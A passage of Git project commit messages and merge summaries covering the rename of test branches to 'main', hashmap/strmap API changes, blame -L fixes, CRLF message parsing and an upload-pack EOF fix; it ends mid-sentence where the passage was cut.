option parser, which has allowed the -L option used together
with the --follow option. Because the latter requires exactly
one path given, but the former takes no pathspec, they become
mutually incompatible automatically. Because the -L option
follows renames on its own, there is no reason to give --follow
at the same time.
The new tests say they may fail with "-L and --follow being
incompatible" instead of "-L and pathspec being incompatible".
Currently the expected failure can come only from the latter, but
this is to futureproof them, in case we decide to add code to
explicitly die on -L and --follow used together.
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In 32c83afc2c (ci: github action - add check for whitespace errors,
2020-09-22), we introduced a GitHub workflow that automatically checks
Pull Requests for whitespace problems.
However, when affected lines contain one or more double quote
characters, this workflow failed to attach the informative comment
because the JavaScript snippet incorrectly interpreted these quotes
instead of using the `git log` output as-is.
Let's fix that.
While at it, let's `await` the result of the `createComment()` function.
Finally, we enclose the log in the comment with ```...``` to avoid
having the diff marker be misinterpreted as an enumeration bullet.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In c57b3367be (worktree: teach `list` to annotate locked worktree,
2020-10-11), we introduced a test case that wanted to talk about
"worktrees" but talked about "worktress" instead. Let's fix that.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the previous three commits, we prepared the `t5515` script and the
files in `t/t5515/` for the upcoming change of the default branch name
to `main`. The changes were made over the course of three commits
because the overall patch would have been too big to send to the Git
mailing list for review.
Naturally, the test could not pass in the transitional stages and was
therefore disabled via the `PREPARE_FOR_MAIN_BRANCH` prereq. Now that
the transition is complete, we can re-enable it.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the previous two commits, we started preparing the `t5515` script
and part of `t/t5515/` for the upcoming change of the default
branch name to `main`. This patch adjusts the remainder of the supporting
material in `t/t5515/` (the patch adjusting all of `t/t5515/` would have
weighed more than 100kB and therefore not made it to the Git mailing
list for review).
Similar to what we did for the `t5515` script itself in the previous
commit, this patch was generated via:
sed -i -e 's/master/main/g' -e 's/Master/Main/g' \
-e 's/6c9dec2b923228c9ff994c6cfe4ae16c12408dc5/ecf3b3627b498bdcb735cc4343bf165f76964e9a/g' \
-e 's/8521c3072461fcfe8f32d67f95cc6e6b832a2db2fa29769ffc788bce85ebcd75/fff666109892bb4b1c80cd1649d2d8762a0663db8b5d46c8be98360b64fbba5f/g' \
-e 's/754b754407bf032e9a2f9d5a9ad05ca79a6b228f/b4ab76b1a01ea602209932134a44f1e6bd610832/g' \
-e 's/6c7abaea8a6d8ef4d89877e68462758dc6774690fbbbb0e6d7dd57415c9abde0/380ebae0113f877ce46fcdf39d5bc33e4dc0928db5c5a4d5fdc78381c4d55ae3/g' \
-- t/t5515/refs.*
In addition to that, we need to adjust some file _names_ in `t/t5515/`
because they encode the branch name:
eval "$(git ls-files t/t5515/refs.\* | sed -n \
-e 's/\(.*\)master\(.*\)/git mv & \1main\2;/p')"
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We just started preparing t5515 for the upcoming change of the default
branch name to `main`. This patch adjusts roughly half of the supporting
material in `t/t5515/` (the patch adjusting all of `t/t5515/` would have
weighed more than 100kB and therefore not made it to the Git mailing
list for review).
Similar to what we did for the `t5515` script itself in the previous
commit, this patch was generated via:
sed -i -e 's/master/main/g' -e 's/Master/Main/g' \
-e 's/6c9dec2b923228c9ff994c6cfe4ae16c12408dc5/ecf3b3627b498bdcb735cc4343bf165f76964e9a/g' \
-e 's/8521c3072461fcfe8f32d67f95cc6e6b832a2db2fa29769ffc788bce85ebcd75/fff666109892bb4b1c80cd1649d2d8762a0663db8b5d46c8be98360b64fbba5f/g' \
-e 's/754b754407bf032e9a2f9d5a9ad05ca79a6b228f/b4ab76b1a01ea602209932134a44f1e6bd610832/g' \
-e 's/6c7abaea8a6d8ef4d89877e68462758dc6774690fbbbb0e6d7dd57415c9abde0/380ebae0113f877ce46fcdf39d5bc33e4dc0928db5c5a4d5fdc78381c4d55ae3/g' \
-- t/t5515/fetch.*
In addition to that, we need to adjust some file _names_ in `t/t5515/`
because they encode the branch name:
eval "$(git ls-files t/t5515/fetch.\* | sed -n \
-e 's/\(.*\)master\(.*\)/git mv & \1main\2;/p')"
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
As part of the effort to change the default branch name to `main`, let's
prepare t5515.
In addition to adjusting the references to the branch name itself, this
also requires two commit hashes to be adjusted (actually four, as there
is a SHA-1 _and_ a SHA-256 of both).
That trick was performed by running
sed -i -e 's/master/main/g' -e 's/Master/Main/g' \
-e 's/6c9dec2b923228c9ff994c6cfe4ae16c12408dc5/ecf3b3627b498bdcb735cc4343bf165f76964e9a/g' \
-e 's/8521c3072461fcfe8f32d67f95cc6e6b832a2db2fa29769ffc788bce85ebcd75/fff666109892bb4b1c80cd1649d2d8762a0663db8b5d46c8be98360b64fbba5f/g' \
-e 's/754b754407bf032e9a2f9d5a9ad05ca79a6b228f/b4ab76b1a01ea602209932134a44f1e6bd610832/g' \
-e 's/6c7abaea8a6d8ef4d89877e68462758dc6774690fbbbb0e6d7dd57415c9abde0/380ebae0113f877ce46fcdf39d5bc33e4dc0928db5c5a4d5fdc78381c4d55ae3/g' \
-- t/t5515-*.sh
These commit hashes have been determined manually, of course, by running
the test after adjusting only the branch names, and then copying the
hashes from the log of the failed run.
Note: this patch only touches the t5515 script so far, not the
supporting material in t/t5515/. The resulting patch would have weighed
over 100kB and therefore the Git mailing list would have dropped it. The
files in t/t5515/ will be adjusted in the next two commits. As t5515
would fail without these adjustments, we temporarily skip it via the
`PREPARE_FOR_MAIN_BRANCH` prereq.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Allow the testsuite to choose which algorithm handles requests for
"recursive" or for the default merge algorithm by consulting the
environment variable GIT_TEST_MERGE_ALGORITHM, which is expected to be
either "recursive" (the old traditional algorithm) or "ort" (the new
algorithm).
Also, allow folks to pick the new algorithm via config setting. It
turns out builtin/merge.c already had a way to allow users to specify a
different default merge algorithm: pull.twohead. Rather odd
configuration name (especially to be in the 'pull' namespace rather than
'merge') but it's there. Add that same configuration to rebase,
cherry-pick, and revert.
This required updating the various callsites that called merge_trees()
or merge_recursive() to conditionally call the new API, so this serves
as another demonstration of what the new API looks and feels like.
There are almost certainly some callsites that have not yet been
modified to work with the new merge algorithm, but this represents the
ones that I have been testing with thus far.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Adjust tests so that they won't scream when the default initial
branch name is changed to 'main'.
* js/default-branch-name-part-4-minus-1:
t1400: prepare for `main` being default branch name
tests: prepare aligned mentions of the default branch name
t9902: prepare a test for the upcoming default branch name
t3200: prepare for `main` being shorter than `master`
t5703: adjust a test case for the upcoming default branch name
t6200: adjust suppression pattern to also match "main"
tests: start moving to a different default main branch name
t9801: use `--` in preparation for default branch rename
fmt-merge-msg: also suppress "into main" by default
"git diff" family of commands learned the "-I<regex>" option to
ignore hunks whose changed lines all match the given pattern.
* mk/diff-ignore-regex:
diff: add -I<regex> that ignores matching changes
merge-base, xdiff: zero out xpparam_t structures
"git apply -R" did not handle patches that touch the same path
twice correctly, which has been corrected. This is most relevant
in a patch that changes a path from a regular file to a symbolic
link (and vice versa).
* jt/apply-reverse-twice:
apply: when -R, also reverse list of sections
"git rebase --rebase-merges" did not correctly pass --gpg-sign
command line option to underlying "git merge" when replaying a merge
using non-default merge strategy or when replaying an octopus merge
(because replaying a two-head merge with the default strategy was
done in a separate codepath, the problem did not trigger for most
users), which has been corrected.
* sc/sequencer-gpg-octopus:
t3435: add tests for rebase -r GPG signing
sequencer: pass explicit --no-gpg-sign to merge
sequencer: fix gpg option passed to merge subcommand
Our test scripts can be told to run only individual pieces while
skipping others with the "--run=..." option; they were taught to
take a substring of test title, in addition to numbers, to name the
test pieces to run.
* en/test-selector:
test-lib: reduce verbosity of skipped tests
t6006, t6012: adjust tests to use 'setup' instead of synonyms
test-lib: allow selecting tests by substring/glob with --run
Add a sample 'push-to-checkout' hook, that performs the same as
what the built-in default action does.
* as/sample-push-to-checkout-hook:
hook: add sample template for push-to-checkout
"git credential" didn't honor the core.askPass configuration
variable (among other things), which has been corrected.
* tk/credential-config:
credential: load default config
Document that the meaning of a Signed-off-by trailer can vary from
project to project in the end-user documentation, and clarify what
it means to this project.
* bk/sob-dco:
Documentation: stylistically normalize references to Signed-off-by:
SubmittingPatches: clarify DCO is our --signoff rule
Documentation: clarify and expand description of --signoff
doc: preparatory clean-up of description on the sign-off option
Test-coverage enhancement of running commit-graph task "git
maintenance" as needed led to discovery and fix of a bug.
* ds/maintenance-commit-graph-auto-fix:
maintenance: core.commitGraph=false prevents writes
maintenance: test commit-graph auto condition
When "git commit-graph" detects the same commit recorded more than
once while it is merging the layers, it used to die. The code now
ignores all but one of them and continues.
* ds/commit-graph-merging-fix:
commit-graph: don't write commit-graph when disabled
commit-graph: ignore duplicates when merging layers
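Ignoring duplicates instead of dying amounts to compacting a sorted list so that each item appears once. The sketch below uses plain integers as stand-ins for commit object names, and `drop_adjacent_duplicates()` is a hypothetical name; the real code works on object IDs.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Compact a sorted array in place so each value is kept once.
 * Returns the new number of elements.
 */
size_t drop_adjacent_duplicates(uint32_t *ids, size_t nr)
{
    size_t in, out = 0;

    for (in = 0; in < nr; in++) {
        /* Skip a value equal to the last one we kept. */
        if (out && ids[out - 1] == ids[in])
            continue;
        ids[out++] = ids[in];
    }
    return out;
}
```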
A test helper "test_cmp A B" was taught to diagnose missing files A
or B as a bug in test, but some tests legitimately wanted to notice
a failure to even create file B as an error, in addition to leaving
the expected result in it, and were misdiagnosed as a bug. This
has been corrected.
* es/test-cmp-typocatcher:
Revert "test_cmp: diagnose incorrect arguments"
"git fast-import" wasted a lot of memory when many marks were in use.
* jk/fast-import-marks-alloc-fix:
fast-import: fix over-allocation of marks storage
The side-band status report can be sent at the same time as the
primary payload multiplexed, but the demultiplexer on the receiving
end incorrectly split a single status report into two, which has
been corrected.
* js/avoid-split-sideband-message:
test-pkt-line: drop colon from sideband identity
sideband: report unhandled incomplete sideband messages as bugs
sideband: avoid reporting incomplete sideband messages
Add strmap as a new struct and associated utility functions,
specifically for hashmaps that map strings to some value. The API is
taken directly from Peff's proposal at
https://lore.kernel.org/git/20180906191203.GA26184@sigill.intra.peff.net/
Note that, similar to string-list, strmap has a strdup_strings setting.
However, unlike string-list, strmap_init() does not take a parameter for
this setting and instead automatically sets it to 1; callers who want to
control this detail need to instead call strmap_init_with_options().
(Future patches will add additional parameters to
strmap_init_with_options()).
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
hashmap_free(), hashmap_free_entries(), and hashmap_free_() have existed
for a while, but aren't necessarily the clearest names, especially with
hashmap_partial_clear() being added to the mix and lazy-initialization
now being supported. Peff suggested we adopt the following names[1]:
- hashmap_clear() - remove all entries and de-allocate any
hashmap-specific data, but be ready for reuse
- hashmap_clear_and_free() - ditto, but free the entries themselves
- hashmap_partial_clear() - remove all entries but don't deallocate
table
- hashmap_partial_clear_and_free() - ditto, but free the entries
This patch provides the new names and converts all existing callers over
to the new naming scheme.
[1] https://lore.kernel.org/git/20201030125059.GA3277724@coredump.intra.peff.net/
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
merge-ort is a heavy user of strmaps, which are built on hashmap.[ch].
clear_or_reinit_internal_opts() in merge-ort was taking about 12% of
overall runtime in my testcase involving rebasing 35 patches of
linux.git across a big rename. clear_or_reinit_internal_opts() was
calling hashmap_free() followed by hashmap_init(), meaning that not only
was it freeing all the memory associated with each of the strmaps just
to immediately allocate a new array again, it was allocating a new array
that was likely smaller than needed (thus resulting in later need to
rehash things). The ending size of the map table on the previous commit
was likely almost perfectly sized for the next commit we wanted to pick,
and not dropping and reallocating the table immediately is a win.
Add some new API to hashmap to clear a hashmap of entries without
freeing map->table (and instead only zeroing it out like alloc_table()
would do, along with zeroing the count of items in the table and the
shrink_at field).
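The contrast between a full clear and a partial clear can be sketched with a toy bucket array. The `toy_table` type and its functions are assumptions for illustration only: they omit hashing, entry ownership and the shrink_at bookkeeping mentioned above.

```c
#include <stdlib.h>
#include <string.h>

struct toy_table {
    void **table;     /* bucket array */
    size_t tablesize; /* number of buckets allocated */
    size_t count;     /* number of stored entries */
};

int toy_init(struct toy_table *t, size_t size)
{
    t->table = calloc(size, sizeof(*t->table));
    t->tablesize = t->table ? size : 0;
    t->count = 0;
    return t->table ? 0 : -1;
}

/* Full clear: give the bucket array back to the allocator. */
void toy_clear(struct toy_table *t)
{
    free(t->table);
    memset(t, 0, sizeof(*t));
}

/*
 * Partial clear: forget every entry but keep the bucket array at its
 * current size, so the next user starts with a well-sized table.
 * (The entries themselves are not owned or freed in this sketch.)
 */
void toy_partial_clear(struct toy_table *t)
{
    if (t->table)
        memset(t->table, 0, t->tablesize * sizeof(*t->table));
    t->count = 0;
}
```

After a partial clear the table pointer and size are unchanged, so refilling it to a similar load causes neither a fresh allocation nor a rehash.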
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Previously, once map->table had been freed, any calls to hashmap_put(),
hashmap_get(), or hashmap_remove() would cause a NULL pointer
dereference (since hashmap_free_() also zeros the memory; without that
zeroing, calling these functions would cause a use-after-free problem).
Modify these functions to check for a NULL table and automatically
allocate as needed.
Also add a HASHMAP_INIT(fn, data) macro for initializing hashmaps on the
stack without calling hashmap_init().
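Lazy allocation paired with a static initializer might look roughly like this. `lazy_map`, `LAZY_MAP_INIT` and the fixed size of 16 slots are all invented for the example; the real macro also records the comparison function and its data.

```c
#include <stdlib.h>

struct lazy_map {
    int *slots;
    size_t size;
};

/* Static initializer: usable without calling any init function. */
#define LAZY_MAP_INIT { NULL, 0 }

/* Allocate the table on first write instead of dereferencing NULL. */
int lazy_put(struct lazy_map *m, size_t idx, int value)
{
    if (!m->slots) {
        m->slots = calloc(16, sizeof(*m->slots));
        if (!m->slots)
            return -1;
        m->size = 16;
    }
    if (idx >= m->size)
        return -1;
    m->slots[idx] = value;
    return 0;
}

/* Reading from a never-allocated map simply finds nothing (0 here). */
int lazy_get(const struct lazy_map *m, size_t idx)
{
    if (!m->slots || idx >= m->size)
        return 0;
    return m->slots[idx];
}
```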
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The variable 'option' is used in __git_ps1_show_upstream()
without being localized.
This clobbers the variable the user may be using for other
purposes, which is bad. Luckily, $option is not used to carry
information around in the script as a global variable. The use
of it in this script has very limited scope (namely, only inside
this function), so just declare that it is "local".
Signed-off-by: Sibo Dong <sibo.dong@outlook.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The penultimate commit moved the initialization of 'sb.path' in
'builtin/blame.c::cmd_blame' before the call to
'blame.c::setup_blame_bloom_data'. Since 'cmd_blame' is the only caller
of 'setup_blame_bloom_data', it is now unnecessary for
'setup_blame_bloom_data' to receive 'path' as a separate argument, as
'sb.path' is already initialized.
Remove this argument from setup_blame_bloom_data's interface and use the
'path' field of the 'sb' 'struct blame_scoreboard' instead.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commit moved the initialization of 'sb.path' in
'builtin/blame.c::cmd_blame' before the call to
'blame.c::setup_scoreboard'. Since 'cmd_blame' is the only caller of
'setup_scoreboard', it is now unnecessary for 'setup_scoreboard' to
receive 'path' as a separate argument, as 'sb.path' is already
initialized.
Remove this argument from setup_scoreboard's interface and use the
'path' field of the 'sb' 'struct blame_scoreboard' instead.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In blame.c::cmd_blame, we send the 'path' field of the 'sb' 'struct
blame_scoreboard' as the 'path' argument to
'line-range.c::parse_range_arg', but 'sb.path' is not set yet; it's set
to the local variable 'path' a few lines later at line 1137.
This 'path' argument is only used in 'parse_range_arg' if we are blaming
a funcname, i.e. `git blame -L :<funcname> <path>`, and in that case it
is sent to 'parse_range_funcname', where it is used to determine if a
userdiff driver should be used for said <path> to match the given
funcname.
Since 'path' is yet unset, the userdiff driver is never used, so we fall
back to the default funcname regex, which is usually not appropriate for
paths that are set to use a specific userdiff driver, and thus either we
match some unrelated lines, or we die with
fatal: -L parameter '<funcname>' starting at line 1: no match
This has been the case ever since `git blame` learned to blame a
funcname in 13b8f68c1f (log -L: :pattern:file syntax to find by
funcname, 2013-03-28).
Enable funcname blaming for paths using specific userdiff drivers by
initializing 'sb.path' earlier in 'cmd_blame', when some of its other
fields are initialized, so that it is set when passed to
'parse_range_arg'.
Add a regression test in 'annotate-tests.sh', which is sourced in
t8001-annotate.sh and t8002-blame.sh, leveraging an existing file used
to test the userdiff patterns in t4018-diff-funcname.
Also, use 'sb.path' instead of 'path' when constructing the error
message at line 1114, for consistency.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'git blame -h' and 'git log -h' both show '-L <n,m>' and describe this
option as "Process only line range n,m, counting from 1". No hint is
given that a function name regex can also be used.
Use <range> instead, and expand the description of the option to mention
both modes. Remove "counting from 1" as it's unneeded; it's uncommon to
refer to the first line of a file as "line 0".
Also, for 'git log', improve the wording to better reflect the long help.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Several Git commands can make use of the builtin userdiff patterns, but
it's not obvious in the documentation. Add pointers to the 'Defining a
custom hunk header' part of gitattributes(5) in the description of the
following options:
- the '--function-context' option of `git diff` and friends
- the '--function-context' option of `git grep`
- the '-L :<funcname>' option of `git log`, `gitk` and `git blame`
In 'git-grep.txt', take the opportunity to use backticks in the
description of '--show-function', and improve the wording of the
description of '--function-context'.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Make it clearer that a function can be blamed by feeding `git blame`
'-L :<funcname>' by mentioning it at the beginning of the description
of the '-L' option.
Also, in 'line-range-options.txt', which is used for git-log(1) and
gitk(1), do not parenthesize the mention of the ':<funcname>' mode, to
place it on equal footing with the '<start>,<end>' mode.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Improve the formatting of the description of the line-range option '-L'
for `git log`, `gitk` and `git blame`:
- Use bold for <start>, <end> and <funcname>
- Use backticks for literals
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The description of the '-L' option for `git log` and `gitk` is almost
the same, but is repeated in both 'git-log.txt' and 'gitk.txt' (the
difference being that 'git-log.txt' lists the option with a space
after '-L', while 'gitk.txt' lists it as stuck and notes that `gitk`
only understands the stuck form).
Reduce duplication by creating a new file, 'line-range-options.txt',
and include it in both files.
To simplify the presentation, only list the stuck form for both
commands, and remove the note about `gitk` only understanding the stuck
form.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
hashwrite() already buffers writes, so pass the fanout table entries
individually via hashwrite_be32(), which also does the endianness
conversion for us. This avoids a memory copy, shortens the code and
reduces the number of magic numbers.
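For illustration only, the effect of emitting the fanout entries one at
a time in network byte order can be sketched in Python. This is not
Git's C code: `write_fanout` is a hypothetical helper,
`struct.pack(">I", ...)` stands in for hashwrite_be32(), and the
256-entry cumulative layout keyed by the first byte of each object name
is an assumption about the table being written.

```python
import io
import struct


def write_fanout(out, first_bytes):
    """Write a 256-entry cumulative fanout table to a buffered stream."""
    counts = [0] * 256
    for b in first_bytes:
        counts[b] += 1
    total = 0
    for n in counts:
        total += n
        # One big-endian 32-bit write per entry; the stream does the
        # buffering, so no intermediate array of converted values is needed.
        out.write(struct.pack(">I", total))


buf = io.BytesIO()
write_fanout(buf, [0x00, 0x00, 0x01, 0xFF])
print(len(buf.getvalue()))  # 256 entries * 4 bytes each
```

Because each entry is converted and written in one step, there is no
separate conversion pass and no hard-coded table size in bytes.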
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Calling rev-parse to check if the drop subcommand removed the last stash
and treating its failure as confirmation is fragile, as the command can
fail for other reasons, e.g. because the system is out of memory.
Directly check if the reflog is empty instead, which is more robust.
Reported-by: Marek Mrva <mrva@eof-studios.com>
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In addition to the trivial search-and-replace performed over the course
of the previous three commits, there is one test in t5411 that depends
on the length of the default branch name.
Adjust it and use `main` as the default branch name in this test.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t/t5411/*
In the previous commit, we adjusted roughly half of the support files,
to stay under the 100kB limit (mails larger than that are rejected by
the Git mailing list).
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This trick was performed via
$ sed -i -e 's/master/main/g' -e 's/MASTER/MAIN/g' \
-e 's/Master/Main/g' -- t/t5411/test-00[3-5]*
We do not convert the files in `t/t5411/` in one go because the patch
would be too big (mails larger than 100kB are rejected by the Git
mailing list). Instead, we start with roughly half of the support files.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is a straightforward search-and-replace in the test script.
However, this is not yet complete because it requires many more
replacements in `t/t5411/`, too many for a single patch (the Git mailing
list rejects mails larger than 100kB). For that reason, we disable this
test script temporarily via the `PREPARE_FOR_MAIN_BRANCH` prereq.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
First, references to --patch and -p appeared in the description of
git-format-patch, where the options themselves are not included.
Next, the description of --unified option elsewhere had duplicate implied
statements: "Implies --patch. Implies -p."
Signed-off-by: Sergey Organov <sorganov@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
69d2cfe6e8 (bisect.c: remove the_repository reference, 2018-11-10) kept
the implicit the_repository reference in clear_commit_marks_all, which
was made explicit by the previous commit (and which also renamed it to
repo_clear_commit_marks). Replace it as well.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Allow callers to specify the repository to use. Rename the function to
repo_clear_commit_marks to document its new scope. No functional change
intended.
Signed-off-by: René Scharfe <l.s.r@web.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
During stateless packfile negotiation where a depth is given, stateless
RPC clients (e.g. git-remote-curl) will send multiple upload-pack
requests with the first containing only the
wants/shallows/deepens/filters and the subsequent containing haves/done.
When upload-pack handles such requests, entering get_common_commits
without checking whether the client has hung up can result in unexpected
EOF during the negotiation loop and a die() with message "fatal: the
remote end hung up unexpectedly".
Real world effects include:
- A client speaking to git-http-backend via a server that doesn't check
the exit codes of CGIs (e.g. mod_cgi) doesn't know and doesn't care
about the fatal. It continues to process the response body as normal.
- A client speaking to a server that does check the exit code and
returns an errant HTTP status as a result will fail with the message
"error: RPC failed; HTTP 500 curl 22 The requested URL returned error:
500."
- Admins running servers that surface the failure must work around it by
patching code that handles execution of git-http-backend to ignore exit
codes or take other heuristic approaches.
- Admins may have to deal with "hung up unexpectedly" log spam related
to the failures even in cases where the exit code isn't surfaced as an
HTTP server-side error status.
To avoid these EOF related fatals, have upload-pack gently peek for an
EOF between the sending of shallow/unshallow lines (followed by flush)
and the reading of client haves. If the client has hung up at this
point, exit normally.
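The idea of peeking for EOF before entering the negotiation loop can be
sketched as follows. This is a Python analogy, not upload-pack's code:
`client_hung_up` and `negotiate` are hypothetical names, and a blocking
buffered stream is assumed so that an empty peek result means
end-of-stream.

```python
import io


def client_hung_up(reader):
    """Return True if the peer closed the stream, without consuming input."""
    # On a blocking stream, peek() returns empty bytes only at end of stream.
    return reader.peek(1) == b""


def negotiate(reader):
    """Exit quietly on an early hang-up, otherwise go on to read the haves."""
    if client_hung_up(reader):
        return "exit normally"
    return "read haves: " + reader.read().decode("ascii")


print(negotiate(io.BufferedReader(io.BytesIO(b""))))
print(negotiate(io.BufferedReader(io.BytesIO(b"have 1234\n"))))
```

Since the peek does not consume anything, the normal code path still
sees the client's data in full when the client has not hung up.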
Signed-off-by: Daniel Duvall <dan@mutual.io>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
GitHub Actions automated test improvement to skip tests on a tree
identical to what has already been tested.
* js/ci-ghwf-dedup-tests:
ci: make the "skip-if-redundant" check more defensive
ci: work around old records of GitHub runs
"git resurrect" script (in contrib/) learned that the object names
may be longer than 40-hex depending on the hash function in use.
* dl/resurrect-update-for-sha256:
contrib/git-resurrect.sh: use hash-agnostic OID pattern
contrib/git-resurrect.sh: indent with tabs
Micro clean-up.
* cm/t7xxx-cleanup:
t7102: prepare expected output inside test_expect_* block
t7201: put each command on a separate line
t7201: use 'git -C' to avoid subshell
t7102,t7201: remove whitespace after redirect operator
t7102,t7201: remove unnecessary blank spaces in test body
t7101,t7102,t7201: modernize test formatting
In 2.29, "--committer-date-is-author-date" option of "rebase" and
"am" subcommands lost the e-mail address by mistake, which has been
corrected.
* jk/committer-date-is-author-date-fix:
rebase: fix broken email with --committer-date-is-author-date
am: fix broken email with --committer-date-is-author-date
t3436: check --committer-date-is-author-date result more carefully
Add a new test-tool command named 'fast-rebase', which is a
super-slimmed down and nowhere near as capable version of 'git rebase'.
'test-tool fast-rebase' is not currently planned for usage in the
testsuite, but is here for two purposes:
1) Demonstrate the desired API of merge-ort. In particular,
fast-rebase takes advantage of the separation of the merging
operation from the updating of the index and working tree, to
allow it to pick N commits, but only update the index and working
tree once at the end. Look for the calls to
merge_incore_nonrecursive() and merge_switch_to_result().
2) Provide a convenient benchmark that isn't polluted by the heavy
disk writing and forking of unnecessary processes that comes from
sequencer.c and merge-recursive.c. fast-rebase is not meant to
replace sequencer.c, just give ideas on how sequencer.c can be
changed. Updating sequencer.c with these goals is probably a
large amount of work; writing a simple targeted command with
no documentation, less-than-useful help messages, numerous
limitations in terms of flags it can accept and situations it can
handle, and which is flagged off from users is a much easier
interim step.
Signed-off-by: Elijah Newren <newren@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A previous commit adjusted the code in ref-filter.c so that messages
containing CRLF are now correctly parsed and displayed.
Add tests to also check that `git log` and `git show` correctly handle
such messages, to prevent future regressions if these commands are
refactored to use the ref-filter API.
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The ref-filter code does not correctly handle commit or tag messages
that use CRLF as the line terminator. Such messages can be created with
the `--cleanup=verbatim` option of `git commit` and `git tag`, or by
using `git commit-tree` directly.
The function `find_subpos` in ref-filter.c looks for two consecutive
LFs to find the end of the subject line, a sequence which is absent in
messages using CRLF. This results in the whole message being parsed as
the subject line (`%(contents:subject)`), and the body of the message
(`%(contents:body)`) being empty.
Moreover, in `copy_subject`, which wants to return the subject as a
single line, '\n' is replaced by space, but '\r' is
untouched.
This impacts the output of `git branch`, `git tag` and `git
for-each-ref`.
This behaviour is a regression for `git branch --verbose`, which
bisects down to 949af0684c (branch: use ref-filter printing APIs,
2017-01-10).
Adjust the ref-filter code to be more lenient by hardening the logic in
`copy_subject` and `find_subpos` to correctly parse messages containing
CRLF.
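A minimal sketch of the more lenient parsing, written in Python rather
than the C of ref-filter.c. `split_subject_body` is a hypothetical
function that only mirrors the idea described above: accept either LF or
CRLF when looking for the blank line that ends the subject, and fold
either kind of line terminator into a space when flattening the subject.

```python
import re

# A blank line ends the subject; accept LF or CRLF line terminators.
_BLANK_LINE = re.compile(r"\r?\n\r?\n")
_LINE_END = re.compile(r"\r?\n")


def split_subject_body(message):
    """Split a commit or tag message into (single-line subject, body)."""
    m = _BLANK_LINE.search(message)
    if m is None:
        subject, body = message, ""
    else:
        subject, body = message[:m.start()], message[m.end():]
    # Join a multi-line subject with spaces, dropping '\r' as well as '\n'.
    subject = _LINE_END.sub(" ", subject.rstrip("\r\n"))
    return subject, body


print(split_subject_body("Subject first line\r\nsecond line\r\n\r\nBody line\r\n"))
```

With a strict search for two consecutive LFs, the CRLF message above
would have no subject/body boundary at all, which is the failure mode
described in this commit.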
Add a new test script, 't3920-crlf-messages.sh', to test the behaviour
of commands using either the ref-filter or the pretty APIs with messages
using CRLF line endings. The function `test_crlf_subject_body_and_contents`
can be used to test that the `--format` option of `branch`, `tag`,
`for-each-ref`, `log` and `show` correctly displays the subject, body
and raw content of commit and tag messages using CRLF. Test the
output of `branch`, `tag` and `for-each-ref` with such commits.
Helped-by: Junio C Hamano <gitster@pobox.com>
Helped-by: Eric Sunshine <sunshine@sunshineco.com>
Signed-off-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In demultiplex_sideband(), there are two oddities when we check an
incoming packet:
- if it has zero length, then we assume it's a flush packet. This
means we fail to notice the difference between a real flush and a
true zero-length packet that's missing its sideband designator. It's
not a huge problem in practice because we'd never send a zero-length
data packet (even our keepalives are otherwise-empty sideband-1
